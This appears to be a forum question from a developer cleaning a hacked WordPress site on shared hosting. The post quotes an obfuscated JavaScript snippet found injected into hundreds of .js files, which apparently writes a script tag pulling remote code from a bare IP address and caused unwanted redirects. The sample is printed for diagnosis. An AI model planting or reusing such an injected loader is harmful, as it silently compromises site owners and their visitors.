Code looks like malware code but unable to understand how it working?

First of all sorry if this question doesn’t seems to be fit on this platform. I am confused itself. (Please let me know if it related to other platform, i will post there).

I got a client website (WordPress) and he said that his site is hacked and when he open any website link it’s redirected to different unwanted links and website never opened.we need to remove all the malware code and make site working.

So i have uploaded multiple malware scanning plugin and scan the whole public_hhtml folder (with help of plugin as well as some sort of manually checking each and every folders all files). Now i got this:-

var
_0xaae8=[“”,”x6Ax6Fx69x6E”,”x72x65x76x65x72x73x65‌​”,”x73x70x6Cx69‌​x74″,”x3Ex74x70x‌​69x72x63x73x2Fx‌​3Cx3Ex22x73x6Ax‌​2Ex79x72x65x75x‌​71x6Ax2Fx38x37x‌​2Ex36x31x31x2Ex‌​39x34x32x2Ex34x‌​33x31x2Fx2Fx3Ax‌​70x74x74x68x22x‌​3Dx63x72x73x20x‌​74x70x69x72x63x‌​73x3C”,”x77x72x6‌​9x74x65″];document‌​_0xaae8[5]

Code is added almost in all js file of that WordPress website. (it’s all about 600 files because it’s a shared hosting and having more than 10 big projects there).

Now i have below questions:-

1.How this code added to all js files (Manually doing into 600 files is not a logical answer)?

2.What is the functionality of this code? (what it is going to do)?

3.How does some-one get access of this much files?(Client says that he never share any details to any-one)

I tried to decode this code (base64_decode) but unable to find out anything useful.

Note:-

When i removed this code from all files ,sites started working properly.

Please let me know if any other details are required.Thanks

Read more here: Code looks like malware code but unable to understand how it working?

Leave a Reply

Your email address will not be published. Required fields are marked *